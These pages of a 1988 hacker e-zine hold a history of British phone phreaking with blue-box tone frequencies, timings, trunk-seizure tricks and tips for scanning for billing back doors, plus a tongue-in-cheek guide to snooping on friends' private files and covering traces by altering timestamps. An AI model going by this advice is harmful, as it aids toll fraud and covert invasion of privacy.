:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=:=: --Page 16-- File: A HISTORY OF BRITISH PHREAKING $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $ $ $ The History Of British Phreaking $ $ -=- -=-=-=- -- -=-=-=- -=-=-=-=- $ $ $ $ The second in a series of $ $ THE HISTORY OF.....philes $ $ $ $ Written and Uploaded by: $ $ $ $$$$$$$$$$$$-=>Lex Luthor<=-$$$$$$$$$$$ $ and $ $ The Legion Of Doom! $ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ With thanks to Peter McIvers for the list of frequencies mentioned later in this phile. In Britain, phreaking goes back to the early fifties, when the technique of 'Toll A drop back' was discovered. Toll A was an exchange near St. Pauls which routed calls between London and nearby non-London exchanges. The trick was to dial an unallocated number, and then depress the reciever-rest for 1/2 second. This flashing initiated the 'clear forward' signal, leaving the caller with an open line into the Toll A exchange. He could then dial 018, which forwarded him to the trunk exchange- at that time, the first long distance exchange in Britain- and foll ow it with the code for the distant exchange to which he would be connected at no extra charge. The signals needed to control the UK network today were published in the "Institution of Post Office Engineers Journal" and reprinted in the Sunday Times (15 Oct. 1972). The signalling system they use: signalling system No. 3 uses pairs of frequencies selected from 6 tones separated by 120Hz. With that info, the phreaks made "Bleepers" or as they are called here in the U.S. "Blue Box", but they do utilize different MF tones then the U.S., thus, your U.S. blue box that you smuggled into the UK will not work, unless you change the frequencies. In the early seventies, a simpler system based on different numbers of pulses with the same frequency (2280Hz) was used. For more info on that, try to get hold of: Atkinson's "Telephony and Systems Technology". The following are timing and the frequencies for boxing in the UK and other foreign countries. Special thanks to Peter McIvers for the phollowing inpho: British "bleeper" boxes have the very same layout as U.S. blue boxes. The frequencies are different, though. They use two sets of frequencies, forward and backward. Forward signals are sent out by the bleeper box; the backward signals may be ignored (it's sort of like using full duplex). The frequencies are as follows: US: 700 900 1100 1300 1500 1700 Forward: 1380 1500 1620 1740 1860 1980 Hz Backward: 1140 1020 900 780 660 540 Hz for example, change the 900 Hz potentiometers in your box to 1500 Hz. All numbers 1-0 (10) are in the same order as in an American box. The ones after this are thier codes for operator 11, operator 12, spare 13, spare 14, and 15. One of these is KP, one (probably 15) is Star; it won't be too hard to figure out. The signals should carry -11.5dBm +/- 1dB onto the line; the frequencies --Page 17-- should be within +/- 4Hz (as is the British equipment). Also, the 1VF system is still in operation in parts of the U.K. This would encode all signals 1 to 16 as inary numbers; for instance, a five is 0101. There are six intervals per digit, each 50ms long r a total of 300ms. First is a start pulse of 2280 for 50ms. Then, using the example of five (0101), there is a 50ms pause, a 50ms pulse of 2280, a 50ms pause, and a 50ms pulse of 2280. Finally, there is a 50ms pause that signals the end of the digit. The frequency tolerance on the 2280 Hz is +/- 0.3%; it is sent at -6 +/- 1dBm. An idle line is signaled by the presence of a 3825Hz tone for more than 650ms. This must be within 4Hz. France uses the same box codes as the US, with an additional 1900Hz acknowledgement signal, at -8.7 +/- 1dBm per frequency. Spain uses a 2 out of 5 mf code (same frequencies as US), with a 1700 Hz acknowledge signal. Other places using the 1VF system are: Australia, 2280Hz +/-6Hz, 35ms/digit at -6dB. Germany, France: same as Australia; also, some 1VF systems in the UK. Switzerland: same as Australia, only it uses 3000Hz, not 2280. Sweeden: same as above, but at 2400Hz. Spain: some parts use 1VF with 2500Hz. There is one other major system: the 2VF system. In this system, each digit is 35ms long. The number is encoded in binary as with the 1VF system. Using the example of five (0101), here's how the American 2VF system was sent: 2400 pulse, pause, 2040 pulse, pause, 2400 pulse, pause, 2040 pulse, pause. The digits and pauses are all 35ms long, for a total of 280ms per digit. Other countries are still using a similar high/low pair with the same timings. Some parts of Italy use the 1VF system with 2040Hz; some use the 2VF system with 2040 and 2400 (same as original US) Hz. The Netherlands uses a 2VF system with 2400 and 2500 Hz pulses. With the 2VF system, all frequencies should be within 2Hz. Also, here are some specs for American phone equipment: Dial Tone: 350+440Hz, -17.5 to -14.5 dBm/tone. Off-Hook (ROH): 1400+2060+2450+2600(!) on/off 5 times per second Busy: 480+620Hz; solow busy: 0.5 +/- 0.05 sec = 1 period (about twice a second), at -28.5 to -22.5 dBm/tone. Ring: 440+480 Hz at -23.5 to -20.5 dBm/tone. A ring is modulated at 20 +/- 3Hz, 2sec on, 4sec off. Call waiting: 440Hz, on 1 second. Recorder Connection: 1400Hz, beeps every 15minutes. Multiparty line ring: sam% frequency and modulation as ring, but 1sec on, 2sec off (twice as fast). Now, back to British Phreaking:In the early days of British phreaking, the Cambridge University Titan Computer was used to record and circulate numbers found by the exhaustive dialing of local networks. These numbers were used to create a chain of links from local exchange to local exchange across the country, bypassing the trunk circuits. Because the internal routing codes in the UK network are not the same as those dialed by the caller, the phreaks had to discover them by 'probe and listen' techniques or more commonly known in the U.S.--SCANNING. What they did was put in likely signals and listened to find out if they succeeded. The results of scanning were circulated to other phreaks. Discovering each other took time at first, but evenutally the phreaks became organized. The "TAP" of Britain was called "Undercurrents" which enabled British phreaks to share the info on new numbers, equipment etc. To understand what the British british phreaks did, think of the phone --Page 18-- network in three layers of lines: Local, trunk, and international. In the UK, Subcriber Trunk Dialing (STD), is the mechanism which takes a call from the local lines and (legitimately) elevates it to a trunk or international level. The UK phreaks figured that a call at trunk level can be routed through any number of exchanges, provided that the right routing codes were found and used correctly. They also had to discover how to get from local to trunk level either without being charged (which they did with a bleeper box) or without using STD. Chaining has already been mentioned but it requires long strings of digits and speech gets more and more faint as the chain grows, just like it does when you stack trunks back and forth accross the U.S. The way the security reps snagged the phreaks was to put a simple 'printermeter' or as we call it: a pen register on the suspects line, which shows every digit dialed from the subscribers line. The British prefer to get onto the trunks rather than chaining. One way was to discover where local calls use the trunks between neighboring exchanges, start a call and stay on the trunk instead of returning to the local level on reaching the distant switch. This again required exhaustive dialing and made more work for Titan; it also revealed 'fiddles', which were inserted by Post Office Engineers. What fiddling means is that the engineers rewired the exchanges for thier own benefit. The equipment is modified to give access to a trunk with out being charged, an operation which is pretty easy in Step by Step (SXS) electromechanical exchanges, which were installed in Britain even in the 1 0s (NOTE: I know of a back door into the Canadian system on a 4A CO., so if you are on SXS or a 4A, try scanning 3 digit exchanges, ie: dial 999,998,997 etc. and listen for the beep-kerchink, if there are no 3 digit codes which allow direct access to a tandem in your local exchange and bypasses the AMA so you won't be billed, not have to blast 2600 every time you wish to box a call. A famous British 'fiddler' revealed in the early 1970s worked by dialing 173. The caller then added the trunk code of 1 and the subscribers local number. At that time, most engineering test services began with 17X, so the engineers could hide thier fiddles in the nest of service wires. When security reps started searching, the fiddles were concealed by tones signalling: 'number unobtainalbe' or 'equipment engaged' which switched off after a delay. The necessary relays are small and easily hidden. There was another side to phreaking In the UK in the sixties. Before STD was widespread, many 'ordinary' people were driven to occasional phreaking from sheer frustration at the inefficient operator controlled trunk system. This came to a head during a strike about 1961 when operators could not be reached. Nothing complicated was needed. Many operators had been in the habit of repeating the codes as they dialled the requested numbers so people soon learnt the numbers they called frequently. The only 'trick' was to know which exchanges could be dialled through to pass on the trunk number. Callers also needed a pretty quiet place to do it, since timing relative to clicks was import ant. The most famous trial of British phreaks was called the Old Baily trial. Which started on 3 Oct. 1973. What they phreaks did was to dial a spare number at a local call rate but involving a trunk to another exchange Then they send a 'clear forward' to thier local exchange, indicating to it that the call is finished;but the distant exchange doesn't realize because the caller's phone is still Off the hook. They now have an open line into the distant trunk exchange and sends to it a 'seize' signal: '1' which puts him onto its outgoing lines. Now, if they know the codes, the world is open to them. All other exchanges trust his local exchange to handle the billing; they just interpret the tones they hear. Mean while, the local exchange collects only for a local call. The investigators discovered the phreaks holding a conference somewhere in England surrounded by various phone equipment and bleeper boxes, also printouts listing 'secret' Post Office codes. (They probably got them from trashing?) The judge said: "some take to heroin, some take to telephones" for them phone phreaking was not a crime but a hobby to be shared with phellow enthusists and discussed --Page 19-- with the Post Office openly over dinner and by mail. Their approach and attitude to the worlds larges computer, the global telephone system, was that of scientist s conducting experiments or programmers and engineers testing programs and systems. The judge apeared to agree, and even asked them for phreaking codes to use from his local exchange!!! $-The End-$ $-=>Lex Luthor<=-$ Remote sysop of Plover-net 516-935-2481 and Sysop of: The Legion Of Doom! 305-COE-XXXX If your good, you'll find out the #. --Page 20-- �����������������������������͸ ( ) ) Abstruse Authors of Merca ( ( ) �����������������������������; Presents Data Snooping : the Right Way ----------------------------- by Lee Day Data snooping is a popular passtime among personal computer users in North Merca. A data snooper may be defined as one who examines friends' personal, private data while they are not looking. Most users could probably be labeled data snoopers at one time or another. The problem is, many friends are made aware of data snooping activities on their system, either by catching the snooper in the act, or by finding traces of an invasion. Therefore, some public education is necessary to ensure the continuation of this enriching activity. During a "local" snoop, one must be on the alert for the return of the data's owner. If the snooper hears the return of the owner, he should act quickly to appear innocent. Here are several methods : 1) Set up a multi-tasker, and switch to an innocent partition. Caution : The owner may notice a lack of memory, or may switch to the incriminating partition. 2) Call a memory-resident pop-up screen. Programs such as BOSS-SW.COM zip a bogus spreadsheet on the screen. Problem : you may have a hard time explaining your activity, particularly if you are using the owner's computer and he does not have a spreadsheet program. 3) Turn the screen off. Not very effective if the owner turns the screen on again. 4) Reboot. This may be accomplished by "accidentally" tripping the power switch, or making an excuse for rebooting, such as a need for "fresh RAM". If the owner has keen eyes, he may thwart a snooper with a time/date stamp. Some programs automatically create or update files during execution without the user's permission. The snooper's best bet is to avoid these programs, or write-protect the disk. A hard disk may even be write-protected with the use of a trojan horse detector called "BOMBSQAD", which prompts the user for instructions every time a disk-writing attempt is made. If a time-date stamp is actually updated, and looks suspicious, the snooper may change it using Norton's utilities, or a special date-changing utility. He may also delete any newly created files. Of course, a data snooper should NEVER modify the owner's files. This would be the equivalent of cutting the balls off the gander that laid the goose that laid the golden egg. Surely the snooper would gain much more from repeated instances of data snooping than a few moments of revenge or tease. Remember : Data snooping can be an enriching, exciting activity, if approached with an attitude of maturity. �����������������������������������������������������������������������������ķ ) Written by Lee Day for Abstruse Authors of Merca ( �����������������������������������������������������������������������������Ľ --Page 21-- ================================================================================ As another issue of 2280 Magazine draws to an end, we must thank you for your interest in this Magazine, and please feel free to distribute it if you feel it would be appropriate. If you havn't called the 2280 Magazine Home Board yet, Why not ? Heres the info all over again .... The Arena BBS Information Service Uk V21,22,23,22bis [062]/539-063 Always Open Drop us a line if you feel you have anything to contribute to the mag or to the BB, and any critics, etc. Welcomed. Cheers... The Master ================================================================================ 2280 Magazine is distributed by DEVIATED INSTINCT distributors Ltd. The content of this magazine is copyrighted (as a whole body) (C)1988 by DEVIATED INSTINCT. You may distribute this magazine yourself if you wish to, due to a Shareware type marketing scheme. ================================================================================ H A V E P H U N ! ! ---------------------